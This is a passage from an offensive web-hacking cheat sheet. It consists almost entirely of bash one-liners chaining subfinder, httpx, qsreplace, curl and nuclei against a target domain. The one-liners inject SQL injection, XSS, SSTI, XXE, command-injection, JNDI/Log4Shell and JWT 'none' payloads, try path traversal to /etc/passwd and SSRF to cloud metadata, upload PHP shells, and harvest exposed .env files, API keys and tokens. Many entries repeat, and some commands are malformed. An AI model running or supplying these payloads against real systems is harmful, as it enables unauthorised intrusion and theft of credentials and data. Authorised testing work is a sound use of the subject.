-silent -fr 'root:x' -o traversal_hits.txt\n```\n\n#### Exposed Git Repos Finder (Automated)\n```bash\nsubfinder -d target.com | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git.txt\n```\n\n#### IDOR Discovery (Bruteforce Parameter Tampering)\n```bash\ncat all_urls.txt | gf idor | qsreplace 'id=123' | anew idor_urls.txt \u0026\u0026 qsreplace 'id=124' | httpx -silent -mc 200 -o possible_idor.txt\n```\n\n#### JWT Token Misconfig (None Algorithm)\n```bash\ncat all_urls.txt | grep -Ei 'jwt|token' | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none.txt\n```\n\n#### Unrestricted File Upload (Testing Common Upload Points)\n```bash\ncat all_urls.txt | gf upload | qsreplace 'file=payload.php' | httpx -silent -upload-file payload.php -o upload_findings.txt\n```\n\n#### Path Confusion + Overlays (Detect Double Extensions)\n```bash\ncat all_urls.txt | sed 's/$/%00index.php/' | httpx -silent -mc 200 -o path_confusion.txt\n```\n\n#### CORS Wildcard + Credentials Misconfig\n```bash\nsubfinder -d target.com | httpx -silent -path / -H 'Origin: https://evil.com' -hdrs | grep -i 'access-control-allow-origin' | grep 'evil.com' | tee weak_cors.txt\n```\n\n#### Log4Shell Finder (Old but Gold)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace '${jndi:ldap://your-collaborator-url.burpcollaborator.net}' | httpx -silent\n```\n\n#### Server Side Template Injection (SSTI Detection)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_hits.txt\n```\n\n#### Prototype Pollution Detection (Direct \u0026 Indirect)\n```bash\ncat all_urls.txt | gf parameters | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n#### Exposed Debug Pages (Stack Traces, Debug Consoles)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e '/debug\\n/_profiler\\n/_debugbar\\n/_error') -mc 200 -o debug_pages.txt\n```\n\n#### Email Leaks in JS Files\n```bash\ncat all_urls.txt | grep '\\.js$' | xargs -I{} curl -s {} | grep -Eo \"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}\" | tee emails_found.txt\n```\n\n### Cloud Misconfig - Public S3 Buckets\n```bash\nsubfinder -d target.com | httpx -silent -path / -hdrs | grep -i 'x-amz-bucket-region' | tee public_s3.txt\n```\n\n### Exposed Admin Panels (Full Auto Discovery)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/admin-panels.txt) -mc 200 -o exposed_admins.txt\n```\n\n### Mass Content Injection Check (Reflected Params)\n```bash\ncat all_urls.txt | gf xss | qsreplace '\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr '\u003cscript\u003ealert(1)\u003c/script\u003e' -o reflected_xss.txt\n```\n\n### BONUS β€” Ultimate ALL Misconfig Scanner (Headers, Panels, Debug, Leaks)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t misconfiguration/ -o misconfigs_found.txt\n```\n\n### API Key Leaks in JS Files\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -Eo 'AIza[0-9A-Za-z_-]{35}|sk_live_[0-9a-zA-Z]{24}' | tee leaked_api_keys.txt\n```\n\n### Backup Files Discovery (Think: .bak, .old, .swp)\n```bash\ncat all_urls.txt | sed -E 's/(.*)/\\1~\\n\\1.bak\\n\\1.old\\n\\1.swp/' | httpx -silent -mc 200 -o backup_files.txt\n```\n\n### PHP Unit RCE Finder (Real-World Gold)\n```bash\nsubfinder -d target.com | httpx -silent -path /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -mc 200 -o phpunit_rce.txt\n```\n\n### GraphQL Misconfig Detection (Introspection Enabled)\n```bash\ncat all_urls.txt | grep 'graphql' | xargs -I{} curl -s -X POST -d '{\"query\":\"{__schema{types{name}}}\"}' {} | grep -iq 'types' \u0026\u0026 echo \"{} introspection enabled\" \u003e\u003e graphql_misconfigs.txt\n```\n\n### Host Header Injection\n```bash\ncat all_urls.txt | httpx -silent -H 'Host: evil.com' -hdrs | grep -i 'evil.com' | tee host_header_injection.txt\n```\n\n### Open Redirect Finder (Redirection Abuse)\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'https://evil.com' -o open_redirects.txt\n```\n\n### Session Fixation Detection\n```bash\ncat all_urls.txt | gf login | qsreplace 'sessionid=1234abcd' | httpx -silent -fr '1234abcd' -o session_fixation.txt\n```\n\n### Exposed .env Files (Sensitive Config Exposure)\n```bash\nsubfinder -d target.com | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\n### SSRF Detection (Collaboration Automation)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://your-collab-url.burpcollaborator.net' | httpx -silent\n```\n\n### CRLF Injection\n```bash\ncat all_urls.txt | gf crlf | qsreplace '%0D%0ASet-Cookie:crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_injections.txt\n```\n\n### CMS Detection (for Known Exploits)\n```bash\nsubfinder -d target.com | httpx -silent -tech-detect -o cms_detected.txt\n```\n\n### Missing Security Headers (Easy Win)\n```bash\ncat all_urls.txt | httpx -silent -H 'X-Content-Type-Options' -H 'X-Frame-Options' -H 'Content-Security-Policy' -H 'Strict-Transport-Security' | grep -E \"missing|absent\" | tee weak_headers.txt\n```\n\n### Cache Poisoning Detection\n```bash\ncat all_urls.txt | gf cache | qsreplace 'X-Forwarded-Host: evil.com' | httpx -silent -fr 'evil.com' -o cache_poisoning.txt\n```\n\n### Client-Side Prototype Pollution\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'prototype|__proto__|constructor' | tee client_side_prototype.txt\n```\n\n### Sensitive Image Exposures (Backups/Logs)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e '/backup.jpg\\n/screenshot.png\\n/db-dump.png\\n/log.png') -mc 200 -o exposed_images.txt\n```\n\n### BONUS β€” Full Recon Workflow One-Liner\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t vulnerabilities/ -o all_findings.txt\n```\n\n### Log4j Vulnerability Scanner (JNDI Injection)\n```bash\ncat all_urls.txt | qsreplace '${jndi:ldap://your-collab-url.burpcollaborator.net/a}' | httpx -silent -o log4j_candidates.txt\n```\n\n### AWS S3 Bucket Takeover (Misconfigured Buckets)\n```bash\nsubfinder -d target.com | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_buckets.txt\n```\n\n### JWT Secrets Brute Force (Weak Signing Key)\n```bash\ncat jwt_tokens.txt | jwt-cracker -w wordlist.txt -t 50 -o weak_jwt_keys.txt\n```\n\n### CORS Misconfiguration Finder\n```bash\ncat all_urls.txt | httpx -silent -H 'Origin: https://evil.com' -hdrs | grep -E \"Access-Control-Allow-Origin: \\*|Access-Control-Allow-Origin: https://evil.com\" | tee cors_vulns.txt\n```\n\n### GCP Bucket Enumeration (Google Cloud)\n```bash\nsubfinder -d target.com | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o open_gcp_buckets.txt\n```\n\n### Python Pickle Injection Check (Deserialization Bug)\n```bash\ncat all_urls.txt | gf deserialize | qsreplace 'evil_pickle_payload_here' | httpx -silent -o pickle_vulns.txt\n```\n\n### SQL Injection (Error-Based Detection)\n```bash\ncat all_urls.txt | gf sqli | qsreplace \"' OR 1=1 --\" | httpx -silent -fr 'syntax|sql|error|database' -o sql_injection.txt\n```\n\n### Version Disclosure Detection\n```bash\ncat all_urls.txt | httpx -silent -hdrs | grep -Ei 'server:|x-powered-by:' | tee version_disclosures.txt\n```\n\n### CRLF Injection with Cookie Injection Check\n```bash\ncat all_urls.txt | gf crlf | qsreplace '%0d%0aSet-Cookie:+crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_cookie_injection.txt\n```\n\n### Directory Traversal Finder\n```bash\ncat all_urls.txt | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o dir_traversal.txt\n```\n\n### Azure Storage Enumeration\n```bash\nsubfinder -d target.com | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o open_azure_blobs.txt\n```\n\n### Subdomain Takeover Detection (CNAME Pointing to Unclaimed Services)\n```bash\nsubfinder -d target.com | dnsx -silent -a -resp-only | nuclei -silent -t takeover-detection/ -o takeover_candidates.txt\n```\n\n### Unauthorized Admin Panel Access\n```bash\ncat all_urls.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/dashboard\\n/cms\\n/panel\\n/root\\n/console') -mc 200 -o exposed_admins.txt\n```\n\n### IPv6 Asset Discovery (Many Orgs Forget This)\n```bash\nsubfinder -d target.com | dnsx -silent -aaaa -resp-only | tee ipv6_assets.txt\n```\n\n### Template Injection Finder (SSTI)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_vulns.txt\n```\n\n### Open Redirect Detection\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'Location: https://evil.com' -o open_redirects.txt\n```\n\n### Server-Side Request Forgery (SSRF)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://your-burpcollab-url.burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt\n```\n\n### Exposed .git Repositories (Code Leakage)\n```bash\ncat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git_repos.txt\n```\n\n### Command Injection Finder\n```bash\ncat all_urls.txt | gf cmd-injection | qsreplace '\u0026\u0026 id' | httpx -silent -fr 'uid=' -o cmd_injection.txt\n```\n\n### Prototype Pollution Detection\n```bash\ncat all_urls.txt | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n### Email/PII Leakage in Responses\n```bash\ncat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}' -o leaked_emails.txt\n```\n\n### Host Header Injection\n```bash\ncat all_urls.txt | httpx -silent -H 'Host: attacker.com' -fr 'attacker.com' -o host_header_injection.txt\n```\n\n### Path Traversal (Windows)\n```bash\ncat all_urls.txt | qsreplace 'C:/Windows/win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_traversal.txt\n```\n\n### Sensitive Files (Backup Files Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/config.php.bak\\n/database.yml\\n/backup.zip') -mc 200 -o sensitive_files.txt\n```\n\n### Exposed Config Panels (CMS, Jenkins, PhpMyAdmin)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin\\n/jenkins\\n/wp-admin\\n/admin\\n/cpanel') -mc 200 -o exposed_panels.txt\n```\n\n### Hardcoded API Keys in JS Files\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'apiKey|apikey|secret|token|bearer' | tee hardcoded_api_keys.txt\n```\n\n### Spring Boot Actuator Exposed Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path '/actuator/health' -mc 200 -o exposed_actuators.txt\n```\n\n### Gopher SSRF (Redis/SMTP Attack)\n```bash\ncat all_urls.txt | qsreplace 'gopher://127.0.0.1:6379/_COMMAND' | httpx -silent -o gopher_ssrf_candidates.txt\n```\n\n### HTML Injection (Reflected)\n```bash\ncat all_urls.txt | gf xss | qsreplace '\u003ch1\u003ePWNED\u003c/h1\u003e' | httpx -silent -fr '\u003ch1\u003ePWNED\u003c/h1\u003e' -o html_injection.txt\n```\n\n### API Token Misconfiguration (Bearer Token Disclosure)\n```bash\ncat all_urls.txt | httpx -silent -hdrs | grep -i 'authorization: Bearer' | tee bearer_tokens.txt\n```\n\n### WordPress Plugin Vulnerabilities (Outdated Plugins)\n```bash\nnuclei -l subdomains.txt -t cves/wordpress/ -o wp_vulns.txt\n```\n\n### Broken Link Hijacking (Subdomain Takeover via Broken Links)\n```bash\ncat subdomains.txt | gau | grep -E '\\.(js|css|png|jpg|jpeg|gif|svg|woff|ttf|ico)' | httpx -silent -status-code -o broken_links.txt\n```\n\n### CRLF Injection (HTTP Response Splitting)\n```bash\ncat all_urls.txt | qsreplace '%0d%0aSet-Cookie:crlftest=crlfpoc' | httpx -silent -fr 'crlftest=crlfpoc' -o crlf_injection.txt\n```\n\n### Cloud Storage Misconfig (AWS S3 Bucket Public Access)\n```bash\ncat subdomains.txt | nuclei -t misconfiguration/ -o s3_buckets.txt\n```\n\n### HTTP Method Fuzzing (Check PUT/DELETE enabled)\n```bash\ncat subdomains.txt | httpx -silent -methods PUT,DELETE -mc 200 -o risky_methods.txt\n```\n\n### GraphQL Misconfig (Introspection Enabled)\n```bash\ncat subdomains.txt | httpx -silent -path '/graphql' -mc 200 -fr 'Introspection Query' -o graphql_introspection.txt\n```\n\n### DNS Zone Transfer (AXFR Check)\n```bash\nfor domain in $(cat subdomains.txt); do dig axfr $domain @ns1.$domain; done\n```\n\n### CSP Bypass/Weak CSP Check\n```bash\ncat subdomains.txt | nuclei -t security-misconfiguration/csp-missing.yaml -o weak_csp.txt\n```\n\n### Backup Files (Git, SQL Dumps, Zip Archives)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.sql\\n/.git/config\\n/backup.zip') -mc 200 -o backup_leaks.txt\n```\n\n### Session Fixation (Check if sessionID can be set)\n```bash\ncat all_urls.txt | qsreplace 'sessionid=abc123' | httpx -silent -fr 'sessionid=abc123' -o session_fixation.txt\n```\n\n### JWT Secret Bruteforce (Weak Signing Keys)\n```bash\ncat subdomains.txt | jwt_tool -I -bruteforce wordlist.txt -o weak_jwt_keys.txt\n```\n\n### Exposed Email Addresses in Webpages\n```bash\ncat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}' -o leaked_emails.txt\n```\n\n\n### XML External Entity Injection (XXE)\n```bash\ncat all_urls.txt | gf xxe | qsreplace '\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE data [\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cdata\u003e\u0026xxe;\u003c/data\u003e' | httpx -silent -fr 'root:x' -o xxe_poc.txt\n```\n\n### Exposed Directory Listings (Misconfig)\n```bash\ncat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o open_dirs.txt\n```\n\n### Kubernetes Dashboard Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/' -mc 200 -o exposed_k8s_dashboard.txt\n```\n\n### Exposed Swagger API (Public API Docs)\n```bash\ncat subdomains.txt | httpx -silent -path '/swagger-ui.html' -mc 200 -o exposed_swagger.txt\n```\n\n### Open Redirect Detection\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\n### Directory Traversal (../ Exploit)\n```bash\ncat all_urls.txt | gf lfi | qsreplace '../etc/passwd' | httpx -silent -fr 'root:x' -o directory_traversal.txt\n```\n\n### Server-Side Template Injection (SSTI)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_found.txt\n```\n\n### Insecure Cross-Origin Resource Sharing (CORS)\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'https://evil.com' -o weak_cors.txt\n```\n\n### SQL Injection - Quick Payload Fire\n```bash\ncat all_urls.txt | gf sqli | qsreplace \"' OR '1'='1\" | httpx -silent -fr 'error' -o sqli_poc.txt\n```\n\n### Backup Config Files (env/config.php)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/config.php\\n/settings.py\\n/config.json') -mc 200 -o leaked_configs.txt\n```\n\n### SSRF (Server-Side Request Forgery)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt\n```\n\n### File Upload (Potential Upload Endpoints)\n```bash\ncat all_urls.txt | gf upload | httpx -silent -mc 200 -o upload_endpoints.txt\n```\n\n### Sensitive Data Exposure (Credit Card, API Keys)\n```bash\ncat all_urls.txt | httpx -silent -fr 'sk_live|pk_live|eyJhbGci|-----BEGIN PRIVATE KEY-----|4[0-9]{12}(?:[0-9]{3})?' -o sensitive_data.txt\n```\n\n### JWT Token Leak (in URL or Response)\n```bash\ncat all_urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt\n```\n\n### Exposed Database Panels (phpMyAdmin, Mongo, etc)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin/\\n/admin/\\n/mongo-express/') -mc 200 -o exposed_db_panels.txt\n```\n\n### GIT Repo Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git.txt\n```\n\n### Debug Pages (dev.php/test.php)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/test.php\\n/dev.php\\n/debug.php') -mc 200 -o debug_pages.txt\n```\n\n### Exposed API Keys in JavaScript Files\n```bash\ncat subdomains.txt | gau | grep '\\.js$' | httpx -silent -fr 'AIza|sk_live|ghp_' -o api_key_leaks.txt\n```\n\n### Unsafe File Upload (PHP Reverse Shell Upload)\n```bash\ncat upload_endpoints.txt | qsreplace 'file=shell.php' | httpx -silent -mc 200 -o shell_upload.txt\n```\n\n### Clickjacking (Missing X-Frame-Options)\n```bash\ncat subdomains.txt | httpx -silent -header 'X-Frame-Options' -o missing_xfo.txt\n```\n\n### HTTP Parameter Pollution (Duplicate Params)\n```bash\ncat all_urls.txt | qsreplace 'param1=value1\u0026param1=value2' | httpx -silent -mc 200 -o hpp_candidates.txt\n```\n\n### Server Info Disclosure (Version Leaks)\n```bash\ncat subdomains.txt | httpx -silent -sc -title -o server_versions.txt\n```\n\n### Password Reset Token Leak in URL\n```bash\ncat all_urls.txt | grep -i 'reset' | grep -E 'token=|key=' | httpx -silent -o reset_token_leak.txt\n```\n\n### Host Header Injection\n```bash\ncat subdomains.txt | httpx -silent -H \"Host: attacker.com\" -fr \"attacker.com\" -o host_header_injection.txt\n```\n\n### Web Cache Poisoning\n```bash\ncat all_urls.txt | qsreplace 'X-Original-URL: /evil' | httpx -silent -fr 'evil' -o cache_poisoning.txt\n```\n\n### AWS Bucket Takeover (S3)\n```bash\ncat subdomains.txt | awk -F. '{print $1\".\"$2}' | while read domain; do aws s3 ls s3://$domain --no-sign-request; done\n```\n\n### Exposed Secret Tokens in Robots.txt\n```bash\ncat subdomains.txt | httpx -silent -path /robots.txt -fr 'token|key|secret' -o secret_leak_robots.txt\n```\n\n### Email Injection in Contact Forms\n```bash\ncat contact_forms_urls.txt | qsreplace 'email=attacker%0A%0DCC%3Aevil@attacker.com' | httpx -silent -mc 200 -o email_injection.txt\n```\n\n### PHP Info Disclosure (info.php)\n```bash\ncat subdomains.txt | httpx -silent -path /info.php -mc 200 -o phpinfo_exposed.txt\n```\n\n### Debug Endpoints Exposure (Spring Boot Actuator)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/actuator/health\\n/actuator/env\\n/actuator/mappings') -mc 200 -o exposed_actuator.txt\n```\n\n### Directory Listing Enabled\n```bash\ncat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o directory_listing.txt\n```\n\n### Kubernetes Dashboard Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/#/login' -mc 200 -o kube_dashboard_exposed.txt\n```\n\n### Log File Exposure (access.log, error.log)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/access.log\\n/error.log') -mc 200 -o exposed_logs.txt\n```\n\n### Backup Files in Root (zip, tar, sql)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db.sql\\n/site.tar.gz') -mc 200 -o backup_files.txt\n```\n\n### Insecure Direct Object Reference (IDOR)\n```bash\ncat idor_urls.txt | qsreplace 'user_id=123' | httpx -silent -mc 200 -o idor_candidates.txt\n```\n\n### CSP Bypass (Missing or Weak CSP)\n```bash\ncat subdomains.txt | httpx -silent -H 'Content-Security-Policy' -o weak_csp.txt\n```\n\n### Open API Endpoints Discovery\n```bash\ncat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt\n```\n\n### OAuth Token Leak in URLs\n```bash\ncat all_urls.txt | grep -i 'access_token=' -o oauth_token_leaks.txt\n```\n\n### GraphQL Endpoint Discovery\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_found.txt\n```\n\n### Prototype Pollution via Params\n```bash\ncat all_urls.txt | qsreplace '__proto__[test]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n### WordPress XML-RPC Abuse\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_found.txt\n```\n\nπŸ” JWT None Algorithm Bypass Check \n```bash\ncat all_urls.txt | qsreplace 'token=eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none_bypass.txt\n```\n\nπŸš€ Session Fixation via Set-Cookie \n```bash\ncat subdomains.txt | httpx -silent -H \"Cookie: sessionid=attacker-session\" -o session_fixation.txt\n```\n\nπŸ›œ Open Redirects \n```bash\ncat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\nπŸ—‚οΈ Exposed .git Folder \n```bash\ncat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o git_exposed.txt\n```\n\n🌍 Exposed .env Files (Secrets Leak) \n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o env_leaks.txt\n```\n\n🧬 GraphQL Introspection Enabled \n```bash\ncat subdomains.txt | httpx -silent -path /graphql -x POST -body '{\"query\":\"query IntrospectionQuery { __schema { types { name } } }\"}' -fr 'data' -o graphql_introspection.txt\n```\n\nInsecure CORS (Wildcard or Null) \n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr \"https://evil.com\" -o insecure_cors.txt\n```\n\nπŸ“‚ Backup Files Discovery (.zip, .sql, etc) \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db.sql\\n/site_backup.tar.gz') -mc 200 -o backup_files.txt\n```\n\nπŸ“Š Admin Panels Discovery \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/dashboard\\n/panel\\n/cp') -mc 200 -o admin_panels.txt\n```\n\nπŸ’€ Server Side Template Injection (SSTI) \n```bash\ncat all_urls.txt | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti.txt\n```\n\nπŸ“‹ Path Traversal (../ Disclosure) \n```bash\ncat all_urls.txt | qsreplace '../../../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal.txt\n```\n\n🐍 Python Pickle Injection (if Flask or Python backend) \n```bash\ncat all_urls.txt | qsreplace '__class__=os.system\u0026cmd=id' | httpx -silent -fr 'uid=' -o pickle_injection.txt\n```\n\nCRLF Injection (Header Splitting) \n```bash\ncat all_urls.txt | qsreplace '%0d%0aHeader: evil' | httpx -silent -fr 'Header: evil' -o crlf.txt\n```\n\nπŸ’Ύ Exposed Database Admin Panels \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin\\n/adminer\\n/sql') -mc 200 -o db_admin_panels.txt\n```\n\n🧱 File Upload Misconfig (Can upload PHP/JSP) \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.php' {} -s -o - | grep 'shell_exec' -B 2\n```\n\nπŸ•΅οΈβ€β™‚οΈ Cloud Metadata API Exposure (AWS/GCP) \n```bash\ncat subdomains.txt | httpx -silent -path /latest/meta-data/ -mc 200 -o metadata_exposed.txt\n```\n\nπŸ’£ CRLF in Redirect Location Header \n```bash\ncat urls.txt | qsreplace '%0d%0aLocation:%20https://evil.com' | httpx -silent -fr 'evil.com' -o crlf_redirect.txt\n```\n\nπŸ“‘ XSS in JSON Response (Reflected) \n```bash\ncat urls.txt | qsreplace '\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr 'alert(1)' -o xss.json.txt\n```\n\nπŸ”Œ Exposed Internal IPs (Debug Responses) \n```bash\ncat urls.txt | httpx -silent -fr '10\\.|172\\.|192\\.168\\.' -o internal_ips.txt\n```\n\n🌐 Misconfigured WAF Bypass \n```bash\ncat urls.txt | qsreplace '\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -mc 403 -o waf_detected.txt\ncat waf_detected.txt | qsreplace '\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | anew bypass_payloads.txt\ncat bypass_payloads.txt | httpx -silent -mc 200 -o waf_bypass.txt\n```\n\nπŸ“€ Information Disclosure via Verb Tampering \n```bash\ncat subdomains.txt | httpx -silent -method OPTIONS -o verb_tampering.txt\n```\n\n🧰 **S3 Bucket Discovery via Subdomain Bruteforce** \n```bash\ncat subdomains.txt | awk -F. '{print $1\".\"$2}' | xargs -I {} aws s3 ls s3://{} --no-sign-request 2\u003e/dev/null | tee s3_buckets.txt\n```\n\nπŸ’§ **AWS S3 Bucket Takeover (Subdomain Takeover)** \n```bash\ncat subdomains.txt | xargs -I {} host {} | grep 'amazonaws.com' | awk '{print $1}' | httpx -silent -mc 404 -o vulnerable_s3.txt\n```\n\nπŸ“œ **Exposed Swagger/OpenAPI Endpoints** \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/swagger.json\\n/openapi.json\\n/api-docs') -mc 200 -o openapi_endpoints.txt\n```\n\n**Prototype Pollution in Query Params** \n```bash\ncat urls.txt | qsreplace '__proto__[evil]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\nπŸ’‰ **SQL Injection (Basic Reflex Check)** \n```bash\ncat urls.txt | qsreplace \"'\" | httpx -silent -fr 'SQL syntax' -o sqli.txt\n```\n\nπŸ”— **SSRF (Internal IP Scan via Open Redirect or URL Input)** \n```bash\ncat urls.txt | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id' -o ssrf_aws_metadata.txt\n```\n\nπŸ”₯ **Spring Boot Actuator Exposure (DevOps Misconfig)** \n```bash\ncat subdomains.txt | httpx -silent -path /actuator/env -mc 200 -o springboot_actuator_exposed.txt\n```\n\n**JWT None Algorithm Bypass** \n```bash\ncat urls.txt | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -fr 'admin' -o jwt_none_bypass.txt\n```\n\n**Firebase Misconfig (Open Firebase Databases)** \n```bash\ncat subdomains.txt | sed 's/$/.firebaseio.com/' | httpx -silent -path /.json -mc 200 -o open_firebase.txt\n```\n\nπŸ“‘ **GraphQL Playground/Console Discovery** \n```bash\ncat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphql_console.txt\n```\n\n⚠️ **SOAP Service Discovery (Old APIs)** \n```bash\ncat subdomains.txt | httpx -silent -path /services.wsdl -mc 200 -o soap_services.txt\n```\n\nπŸ“¬ **Email Injection via Contact Forms** \n```bash\ncat urls.txt | qsreplace 'test%0d%0aBCC:evil@attacker.com' | httpx -silent -fr 'evil@attacker.com' -o email_injection.txt\n```\n\nπŸ•΅οΈβ€β™‚οΈ **GCP Bucket Enumeration (Public Buckets)** \n```bash\ncat subdomains.txt | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o gcp_buckets.txt\n```\n\nπŸ› οΈ **Deserialization via File Upload (PHP/JAVA Specific)** \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.ser' {} -s -o - | grep 'java.lang' -B 2\n```\n\nπŸ”— **IDOR Detection via Incremental IDs** \n```bash\ncat urls.txt | qsreplace 'id=123' | anew incremental_ids.txt\ncat incremental_ids.txt | qsreplace 'id=124' | httpx -silent -fr 'profile' -o idor_found.txt\n```\n\n**Azure Blob Storage Enumeration** \n```bash\ncat subdomains.txt | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o azure_blobs.txt\n```\n\n🎯 **XXE Injection via File Upload (XML Files)** \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.xml' {} -s -o - | grep 'root:' -B 2\n```\n\nπŸ“Š **Exposed Kibana Dashboards (DevOps)** \n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o exposed_kibana.txt\n```\n\n**CVE Scanner for Web Targets (Nuclei One-Liner)** \n```bash\ncat subdomains.txt | nuclei -silent -t cves/ -o found_cves.txt\n```\n\nπŸ“ˆ **LFI via Log Poisoning** \n```bash\ncat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_poisoning_lfi.txt\n```\n\nπŸ—„οΈ **Exposed Jenkins Console (DevOps)** \n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt\n```\n\nπŸ“‚ Exposed Git Directories (Sensitive Files in .git)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git.txt\n```\n\nπŸ”₯ Open Kibana (Cloud Misconfiguration)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nπŸ“€ Exposed Env Files (Secrets 